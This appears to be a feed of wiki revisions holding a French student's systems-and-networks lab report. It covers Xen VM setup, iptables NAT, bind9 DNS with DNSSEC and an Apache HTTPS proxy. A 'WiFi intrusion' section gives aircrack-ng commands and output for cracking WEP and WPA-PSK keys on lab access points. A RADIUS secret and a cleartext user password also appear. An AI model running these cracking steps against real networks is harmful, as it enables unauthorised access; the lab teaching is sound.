client wifi-ap-306 {                                                                &lt;br /&gt;
                ipaddr = 172.27.0.3                                                 &lt;br /&gt;
                secret = radius_thomas                                              &lt;br /&gt;
                shortname = wifi-e306                                               &lt;br /&gt;
                nas_type = cisco                                                    &lt;br /&gt;
}                                                                                   &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Dans /etc/freeradius/3.0/users :&amp;lt;syntaxhighlight&amp;gt;&lt;br /&gt;
&amp;quot;tdelobel&amp;quot; Cleartext-Password := &amp;quot;Seconddegree2&amp;quot;                                    &lt;br /&gt;
        Tunnel-Type = VLAN,                                                         &lt;br /&gt;
        Tunnel-Medium-Type = IEEE-802,                                              &lt;br /&gt;
        Tunnel-Private-Group-Id = 16                                                &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;/div&gt;</summary>
		<author><name>Tdelobel</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E6&amp;diff=12552</id>
		<title>Atelier SysRes SE4 2025/2026 E6</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E6&amp;diff=12552"/>
		<updated>2026-02-27T13:52:52Z</updated>

		<summary type="html">&lt;p&gt;Tdelobel : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=== Compte rendu : ===&lt;br /&gt;
&lt;br /&gt;
==== Création du bridge dans capbreton ====&lt;br /&gt;
Avant de créer nos VM, on ajoute notre bridge à capbreton  dans SE42026_cpayet_tdelobel&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
auto pont_pacman&lt;br /&gt;
iface pont_pacman inet manual&lt;br /&gt;
    bridge_ports none&lt;br /&gt;
    up ip link set $IFACE up&lt;br /&gt;
    down ip link set $IFACE down&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;On utilise ifup pour le démarrer.&lt;br /&gt;
&lt;br /&gt;
==== Création des VMs ====&lt;br /&gt;
Pour créer la VM de service et mandataire, on utilise les commandes suivantes&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
xen-create-image --hostname=SE4.Manjaro         --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force&lt;br /&gt;
xen-create-image --hostname=SE4.LinusTorvalds   --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Manjaro sera la machine de service et LinusTorvalds la mandataire&lt;br /&gt;
&lt;br /&gt;
Puis &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
xen create /etc/xen/SE4.Manjaro.cfg&lt;br /&gt;
xen create /etc/xen/SE4.LinusTorvalds.cfg&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Nos machines sont maintenant listées.&lt;br /&gt;
&lt;br /&gt;
==== Partitionnement ====&lt;br /&gt;
&lt;br /&gt;
===== Sur capbreton =====&lt;br /&gt;
Tout d'abord on se donne 10g d'espace pour notre machine virtuelle :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
lvcreate -n SE4.Manjaro.var -L 10G virtual&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;On ajoute dans /etc/xen/SE4.Manjaro.cfg : &amp;lt;syntaxhighlight lang=&amp;quot;cfg&amp;quot;&amp;gt;&lt;br /&gt;
disk = [&lt;br /&gt;
            [...],&lt;br /&gt;
            'phy:/dev/virtual/SE4.Manjaro.home,xvda3,w',&lt;br /&gt;
            'phy:/dev/virtual/SE4.Manjaro.var,xvdb1,w'&lt;br /&gt;
        ]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Sur la VM =====&lt;br /&gt;
Afin que la configuration soit enregistré, on modifie le /etc/fstab en ajoutant les lignes suivantes :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
/dev/xvda3 /var ext4 defaults 0 2&lt;br /&gt;
/dev/xvdb1 /home ext4 defaults 0 2&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Puis dans le terminal, on utilise les commandes suivantes (à ne surtout pas utiliser sur capbreton !!)&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
mkfs -t ext4 /dev/xvda3&lt;br /&gt;
mkfs -t ext4 /dev/xvdb1&lt;br /&gt;
mount /dev/xvda3 /mnt&lt;br /&gt;
mv /var/* /mnt&lt;br /&gt;
umount /mnt&lt;br /&gt;
mount -a&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;On peut maintenant relancer la machine pour verifier si la config reste.&lt;br /&gt;
&lt;br /&gt;
Enfin on répète le même schéma pour la machine mandataire.&lt;br /&gt;
&lt;br /&gt;
==== Adresses ipv4 et ipv6 ====&lt;br /&gt;
Tout d'abord dans notre machine des service, on donne une adresse ipv4 local et ipv6, on modifie donc le fichier /etc/network/interfaces :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
auto lo&lt;br /&gt;
iface lo inet loopback&lt;br /&gt;
&lt;br /&gt;
auto eth0&lt;br /&gt;
iface eth0 inet static&lt;br /&gt;
    address 192.168.10.2/24&lt;br /&gt;
    gateway 192.168.10.1&lt;br /&gt;
&lt;br /&gt;
auto eth1&lt;br /&gt;
iface eth1 inet6 auto&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;On va aussi ajouter le bridge depuis capbreton dans /etc/xen/SE4.Manjaro.cfg:&amp;lt;syntaxhighlight lang=&amp;quot;cfg&amp;quot;&amp;gt;&lt;br /&gt;
vif = [[...], 'mac=00:16:3E:36:79:D9,bridge=SE4']&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Et dans la machine mandataire on va donner une adresse ipv4 du reseau publique et privé:&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
auto lo                                                                             &lt;br /&gt;
iface lo inet loopback                                                              &lt;br /&gt;
&lt;br /&gt;
auto eth0                                                                           &lt;br /&gt;
iface eth0 inet static                                                              &lt;br /&gt;
        address 192.168.10.1/24                                                     &lt;br /&gt;
&lt;br /&gt;
auto eth1                                                                           &lt;br /&gt;
iface eth1 inet static                                                              &lt;br /&gt;
        address 193.48.57.166/24                                                    &lt;br /&gt;
        gateway 193.48.57.162                                                       &lt;br /&gt;
iface eth1 inet6 auto                                                               &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;On ajoute au fichier resolv.conf le dns de google et on install les outils qui nous servirons pour la suite (iptables-persistant, ssh, bind9, apache 2...)&lt;br /&gt;
&lt;br /&gt;
==== Masquerade et ssh ====&lt;br /&gt;
Nous pouvons maintenant mettre en places les iptables pour s'occuper à la fois du ssh (redirection de port) et de la Masquerade avec les commandes suivantes :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
iptables -t nat -A PREROUTING -p tcp --dport 2202 -j DNAT --to-destination 192.168.10.3:22&lt;br /&gt;
iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.10.0/24&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Après avoir sauvegarder avec iptables-save, on décommente dans  &amp;lt;code&amp;gt;/etc/sysctl.conf&amp;lt;/code&amp;gt;:&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
net.ipv4.ip_forward=1&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Enfin pour permettre de se ssh en root sur toutes les VM, on ajoute dans  &amp;lt;code&amp;gt;/etc/ssh/sshd_config&amp;lt;/code&amp;gt; :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
PermitRootLogin yes&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Maintenant, il n'est plus obligatoire de passer par capbreton pour se connecter aux VM, nous utiliserons les commandes suivantes :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
ssh root@193.48.57.166 #pour la machine mandataire&lt;br /&gt;
ssh root@193.48.57.166 -p 2202 # pour la machine de service&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== DNS ====&lt;br /&gt;
&lt;br /&gt;
===== Machine de service =====&lt;br /&gt;
On débute par modifier &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; , on y ajoute notre zone principale et celle de notre camarade :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
zone &amp;quot;archlinux.lol&amp;quot; {                                                              &lt;br /&gt;
        type master;                                                                &lt;br /&gt;
        file &amp;quot;/etc/bind/zones/db.archlinux.lol&amp;quot;;                                    &lt;br /&gt;
        allow-transfer{secondaries;};                                               &lt;br /&gt;
        also-notify{hiddensecondaries;};                                            &lt;br /&gt;
        notify yes;                                                                 &lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
acl &amp;quot;secondaries&amp;quot; {                                                                 &lt;br /&gt;
        192.168.10.3;                                                               &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe8b:45ed;                                      &lt;br /&gt;
        192.168.10.1;                                                               &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:feaa:bff0;                                      &lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
masters &amp;quot;hiddensecondaries&amp;quot; {                                                       &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:feaa:bff0;                                      &lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
zone &amp;quot;archlinuxbtw.lol&amp;quot; {                                                           &lt;br /&gt;
        type secondary;                                                             &lt;br /&gt;
        file &amp;quot;/etc/bind/backup/db.archlinuxbtw.lol&amp;quot;;                                &lt;br /&gt;
        primaries{2001:660:4401:60a0:216:3eff:fe8b:45ed;};                          &lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                           &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Puis on crée notre zone db.archlinux.lol :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
$TTL 400                                                                            &lt;br /&gt;
                                                                                    &lt;br /&gt;
@ IN SOA ns.archlinux.lol. admin.archlinux.lol. (                                   &lt;br /&gt;
           3611     ; Numéro de version                                             &lt;br /&gt;
          21600     ; Rafraîchissement (6h)                                         &lt;br /&gt;
           3600     ; Re-tentative (1h)                                             &lt;br /&gt;
        2592000     ; Expiration (30j)                                              &lt;br /&gt;
          86400     ; Cache négatif (24h)                                           &lt;br /&gt;
);                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
@ IN NS ns.archlinux.lol.                                                           &lt;br /&gt;
@ IN NS ns.archlinuxbtw.lol.                                                        &lt;br /&gt;
                                                                                    &lt;br /&gt;
ns IN A 193.48.57.166                                                               &lt;br /&gt;
@ IN A 193.48.57.166                                                                &lt;br /&gt;
ns IN AAAA 2001:660:4401:60a0:216:3eff:fe36:79d9                                    &lt;br /&gt;
@ IN AAAA 2001:660:4401:60a0:216:3eff:fe36:79d9                                     &lt;br /&gt;
                                                                                    &lt;br /&gt;
www IN CNAME archlinux.lol.                                                         &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Machine mandataire =====&lt;br /&gt;
Dans la machine mandataire, on doit passer les zones de nos machine de service en zone secondaire, ainsi, on aura un fichier tel que celui-ci :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
zone &amp;quot;archlinuxbtw.lol&amp;quot; {                                                           &lt;br /&gt;
        type secondary;                                                             &lt;br /&gt;
        file &amp;quot;/etc/bind/backup/db.archlinuxbtw.lol&amp;quot;;                                &lt;br /&gt;
        primaries{2001:660:4401:60a0:216:3eff:fe8b:45ed;};                          &lt;br /&gt;
};                                                                                  &lt;br /&gt;
zone &amp;quot;archlinux.lol&amp;quot; {                                                              &lt;br /&gt;
        type secondary;                                                             &lt;br /&gt;
        file &amp;quot;/etc/bind/backup/db.archlinux.lol&amp;quot;;                                   &lt;br /&gt;
        primaries{2001:660:4401:60a0:216:3eff:fe36:79d9;};                          &lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
acl &amp;quot;secondaries&amp;quot; {                                                                 &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe8b:45ed;                                      &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe36:79d9;                                      &lt;br /&gt;
};                                                                                  &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Enfin, il faut rajouter nos zones au Glue records de Gandi pour que notre DNS soit reconnu partout dans le monde.&lt;br /&gt;
&lt;br /&gt;
On peut d'ailleurs le vérifier sur le site https://dnschecker.org/&lt;br /&gt;
[[Fichier:Dns-check-thomas.png|centré|vignette]]&lt;br /&gt;
&lt;br /&gt;
==== DNSSEC ====&lt;br /&gt;
Afin de sécuriser notre DNS, on modifie notre &amp;lt;code&amp;gt;/etc/bind/named.conf.local&amp;lt;/code&amp;gt; :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
zone &amp;quot;archlinux.lol&amp;quot; {                                                              &lt;br /&gt;
        type master;                                                                &lt;br /&gt;
        file &amp;quot;/etc/bind/zones/db.archlinux.lol&amp;quot;;                                    &lt;br /&gt;
        allow-transfer{secondaries;};                                               &lt;br /&gt;
        also-notify{hiddensecondaries;};                                            &lt;br /&gt;
        notify yes;                                                                 &lt;br /&gt;
        key-directory &amp;quot;/etc/bind/keys&amp;quot;;                                             &lt;br /&gt;
        dnssec-policy &amp;quot;dnspol&amp;quot;;                                                     &lt;br /&gt;
        inline-signing yes;&lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
acl &amp;quot;secondaries&amp;quot; {                                                                 &lt;br /&gt;
        192.168.10.3;                                                               &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:fe8b:45ed;                                      &lt;br /&gt;
        192.168.10.1;                                                               &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:feaa:bff0;                                      &lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
masters &amp;quot;hiddensecondaries&amp;quot; {                                                       &lt;br /&gt;
        2001:660:4401:60a0:216:3eff:feaa:bff0;                                      &lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
zone &amp;quot;archlinuxbtw.lol&amp;quot; {                                                           &lt;br /&gt;
        type secondary;                                                             &lt;br /&gt;
        file &amp;quot;/etc/bind/backup/db.archlinuxbtw.lol&amp;quot;;                                &lt;br /&gt;
        primaries{2001:660:4401:60a0:216:3eff:fe8b:45ed;};                          &lt;br /&gt;
};                                                                                  &lt;br /&gt;
                                                                                    &lt;br /&gt;
dnssec-policy &amp;quot;dnspol&amp;quot; {                                                            &lt;br /&gt;
   keys {                                                                           &lt;br /&gt;
       ksk key-directory lifetime unlimited algorithm 13;                           &lt;br /&gt;
       zsk key-directory lifetime unlimited algorithm 13;                           &lt;br /&gt;
   };                                                                               &lt;br /&gt;
   nsec3param;                                                                      &lt;br /&gt;
};                                                                                  &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;et on ajoute un répertoire pour les clés (auquel on donnera les permissions d'écriture) :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
mkdir /etc/bind/keys &lt;br /&gt;
chown bind:bind /etc/bind/keys &lt;br /&gt;
chmod 750 /etc/bind/keys&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Après avoir redémaré bind9 et named, on peut voir que les clés sont effectivement bien généré. Pour vérifier si notre DNS est sécurisé, il faudra passer par https://dnsviz.net/&lt;br /&gt;
[[Fichier:DNSSEC-thomas.png|centré|vignette]]&lt;br /&gt;
&lt;br /&gt;
==== serveur Apache ====&lt;br /&gt;
&lt;br /&gt;
===== Sur la machine de service =====&lt;br /&gt;
&lt;br /&gt;
En premier lieu, on va générer notre clé avec :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
openssl req -nodes -newkey rsa:2048 -sha256 -keyout archlinux.lol.key -out archlinux.csr&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Une fois la clé généré on récupère la certification la certification sur Gandi&lt;br /&gt;
&lt;br /&gt;
On va ensuite créer notre site dans &amp;lt;code&amp;gt;etc/apache2/sites-available/archlinux.lol.conf&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
La page html sera enregistré dans &amp;lt;code&amp;gt;etc/www/archlinux.lol&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On effectue aussi une redirection du port http vers https.&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;VirtualHost *:80&amp;gt;                                                                  &lt;br /&gt;
    ServerName archlinux.lol                                                        &lt;br /&gt;
    ServerAlias www.archlinux.lol                                                   &lt;br /&gt;
    Redirect permanent / https://archlinux.lol/                                     &lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;                                                                      &lt;br /&gt;
                                                                                    &lt;br /&gt;
&amp;lt;VirtualHost *:443&amp;gt;                                                                 &lt;br /&gt;
    ServerName archlinux.lol                                                        &lt;br /&gt;
    ServerAlias www.archlinux.lol                                                   &lt;br /&gt;
    DocumentRoot /var/www/archlinux.lol                                             &lt;br /&gt;
                                                                                    &lt;br /&gt;
    &amp;lt;Directory /var/www/archlinux.lol&amp;gt;                                              &lt;br /&gt;
        Options Indexes FollowSymLinks                                              &lt;br /&gt;
        AllowOverride All                                                           &lt;br /&gt;
        Require all granted                                                         &lt;br /&gt;
    &amp;lt;/Directory&amp;gt;                                                                    &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    ErrorLog ${APACHE_LOG_DIR}/error.log                                            &lt;br /&gt;
    CustomLog /var/log/apache2/secure_access.log combined                           &lt;br /&gt;
                                                                                    &lt;br /&gt;
    SSLEngine on                                                                    &lt;br /&gt;
    SSLCertificateFile /etc/ssl/certs/archlinux.lol.crt                             &lt;br /&gt;
    SSLCertificateKeyFile /etc/ssl/private/archlinux.lol.key                        &lt;br /&gt;
    SSLCertificateChainFile /etc/ssl/certs/GandiCert.pem                            &lt;br /&gt;
                                                                                    &lt;br /&gt;
    SSLVerifyClient None                                                            &lt;br /&gt;
                                                                                    &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;                                                                      &lt;br /&gt;
                                                                                    &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Notre site est maintenant accessible en ipv6. Il faut maintenant configurer la machine mandataire pour qu'il le soit aussi en ipv4.  &lt;br /&gt;
&lt;br /&gt;
===== Sur la machine de mandataire =====&lt;br /&gt;
Là aussi, après avoir récupéré les clé et certificat de la machine mandataire, on va crée un fichier &amp;lt;code&amp;gt;etc/apache2/sites-available/archlinux.lol-proxy.conf&amp;lt;/code&amp;gt;&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;VirtualHost *:80&amp;gt;                                                                  &lt;br /&gt;
    ServerName archlinux.lol                                                        &lt;br /&gt;
    ServerAlias www.archlinux.lol                                                   &lt;br /&gt;
    Redirect permanent / https://archlinux.lol/                                     &lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;                                                                      &lt;br /&gt;
                                                                                    &lt;br /&gt;
&amp;lt;VirtualHost *:443&amp;gt;                                                                 &lt;br /&gt;
    ServerName archlinux.lol                                                        &lt;br /&gt;
    ServerAlias www.archlinux.lol                                                   &lt;br /&gt;
                                                                                    &lt;br /&gt;
    SSLProxyEngine on                                                               &lt;br /&gt;
    ProxyPass / https://archlinux.lol/                                              &lt;br /&gt;
    ProxyPassReverse / https://archlinux.lol/                                       &lt;br /&gt;
    ProxyPreserveHost on                                                            &lt;br /&gt;
                                                                                    &lt;br /&gt;
    SSLEngine on                                                                    &lt;br /&gt;
    SSLCertificateFile /etc/ssl/certs/archlinux.lol.crt                             &lt;br /&gt;
    SSLCertificateKeyFile /etc/ssl/private/archlinux.lol.key                        &lt;br /&gt;
    SSLCertificateChainFile /etc/ssl/certs/GandiCert.pem                            &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
    ErrorLog ${APACHE_LOG_DIR}/error.log                                            &lt;br /&gt;
    CustomLog ${APACHE_LOG_DIR}/access.log combined                                 &lt;br /&gt;
&amp;lt;/VirtualHost&amp;gt;                                                                      &lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Notre site est maintenant disponible partout et en https.&lt;br /&gt;
[[Fichier:Site-thomas.png|centré|vignette]]&lt;br /&gt;
&lt;br /&gt;
==== Effraction WIFI ====&lt;br /&gt;
&lt;br /&gt;
===== Cassage WEP =====&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
sudo airodump-ng wlan1&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;On trouve cracotte06 avec son adresse et son chanel&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
sudo airodump-ng wlan1 --write dump --bssid 04:DA:D2:9C:50:55 -c4&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Le fichier dump étant crée, on récupère la clé avec la commande suivante :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
sudo  aircrack-ng -b 04:DA:D2:9C:50:55 dump-22.cap&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
                                                                                     Aircrack-ng 1.7 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                                                                       [00:00:00] Tested 525 keys (got 63977 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    1/  2   20(74752) 5B(73216) F0(73216) 1E(72704) 77(72192) 12(71936) 78(71936) ED(71936) 21(71680) EF(71680) 58(71424) AE(71424) 4D(71168) 5A(70656) 02(70400) &lt;br /&gt;
    1    5/  1   48(74496) DA(71936) 47(71680) 55(71680) B9(71168) BD(70656) DE(70656) 01(70400) 77(70400) A2(70400) 6C(70144) 74(70144) 7C(70144) 8E(70144) 92(70144) &lt;br /&gt;
    2   73/  2   CE(66560) CC(66304) E2(66304) DD(66048) ED(66048) 69(65536) 97(65536) A7(65536) AC(65536) B8(65536) 44(65280) 72(65280) D7(65280) EA(65280) F4(65280) &lt;br /&gt;
    3    7/ 11   5C(73984) 14(72960) 6E(72960) E8(72448) 00(71424) EB(71424) 04(71168) 23(70912) 35(70912) AB(70912) 58(70656) 1B(70400) CA(70400) D4(70400) FE(70400) &lt;br /&gt;
    4    0/  3   F6(92416) 2D(73472) 30(72704) 6A(71680) 9D(71680) BD(71680) C9(71680) 2B(71168) 3D(70400) 52(70400) C8(70400) D8(70400) 49(70144) F8(70144) FE(69632) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ FF:FF:FF:FF:FA:BC:07:CB:AE:EE:EE:EE:EE ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Cassage WPA-PKS =====&lt;br /&gt;
&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
sudo airodump-ng wlan1 --write dump --bssid 44:AD:D9:5F:87:05 -c13&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;On va maintenant essayer de récupéré la clé avec un dictionaire dico.txt&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
sudo  aircrack-ng -a2 -w dico.txt -b 44:AD:D9:5F:87:05 dump-23.cap&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
                               Aircrack-ng 1.7 &lt;br /&gt;
&lt;br /&gt;
      [00:28:29] 66973408/100000000 keys tested (39839.22 k/s) &lt;br /&gt;
&lt;br /&gt;
      Time left: 13 minutes, 48 seconds                         66.97%&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 66684666 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 63 5F 7F 36 2C 70 49 04 6A 29 11 FE C8 C1 0C FD &lt;br /&gt;
                       4D 16 18 BE C9 48 70 31 C5 7B 13 BD E1 02 8A 15 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &lt;br /&gt;
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &lt;br /&gt;
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &lt;br /&gt;
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &lt;br /&gt;
&lt;br /&gt;
      EAPOL HMAC     : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 &lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;/div&gt;</summary>
		<author><name>Tdelobel</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E6&amp;diff=12538</id>
		<title>Atelier SysRes SE4 2025/2026 E6</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=Atelier_SysRes_SE4_2025/2026_E6&amp;diff=12538"/>
		<updated>2026-02-27T13:39:04Z</updated>

		<summary type="html">&lt;p&gt;Tdelobel : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;=== Compte rendu : ===&lt;br /&gt;
&lt;br /&gt;
==== Création du bridge dans capbreton ====&lt;br /&gt;
Avant de créer nos VM, on ajoute notre bridge à capbreton  dans SE42026_cpayet_tdelobel&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
auto pont_pacman&lt;br /&gt;
iface pont_pacman inet manual&lt;br /&gt;
    bridge_ports none&lt;br /&gt;
    up ip link set $IFACE up&lt;br /&gt;
    down ip link set $IFACE down&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;On utilise ifup pour le démarrer.&lt;br /&gt;
&lt;br /&gt;
==== Création des VMs ====&lt;br /&gt;
Pour créer la VM de service et mandataire, on utilise les commandes suivantes&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
xen-create-image --hostname=SE4.Manjaro         --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force&lt;br /&gt;
xen-create-image --hostname=SE4.LinusTorvalds   --dhcp --bridge=pont_pacman --dir=/usr/local/xen --size=10G --dist=daedalus --memory=2048M --force&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Manjaro sera la machine de service et LinusTorvalds la mandataire&lt;br /&gt;
&lt;br /&gt;
Puis &amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
xen create /etc/xen/SE4.Manjaro.cfg&lt;br /&gt;
xen create /etc/xen/SE4.LinusTorvalds.cfg&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;Nos machines sont maintenant listées.&lt;br /&gt;
&lt;br /&gt;
==== Partitionnement ====&lt;br /&gt;
&lt;br /&gt;
===== Sur capbreton =====&lt;br /&gt;
Tout d'abord on se donne 10g d'espace pour notre machine virtuelle :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
lvcreate -n SE4.Manjaro.var -L 10G virtual&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;On ajoute dans /etc/xen/SE4.Manjaro.cfg : &amp;lt;syntaxhighlight lang=&amp;quot;cfg&amp;quot;&amp;gt;&lt;br /&gt;
disk = [&lt;br /&gt;
            [...],&lt;br /&gt;
            'phy:/dev/virtual/SE4.Manjaro.home,xvda3,w',&lt;br /&gt;
            'phy:/dev/virtual/SE4.Manjaro.var,xvdb1,w'&lt;br /&gt;
        ]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/syntaxhighlight&amp;gt;&lt;br /&gt;
&lt;br /&gt;
===== Sur la VM =====&lt;br /&gt;
Afin que la configuration soit enregistré, on modifie le /etc/fstab en ajoutant les lignes suivantes :&amp;lt;syntaxhighlight lang=&amp;quot;bash&amp;quot;&amp;gt;&lt;br /&gt;
/dev/xvda3 /var ext4 defaults 0 2&lt;br /&gt;
/dev/xvdb1 /home ext4 defaults 0 2&lt;br /&gt;
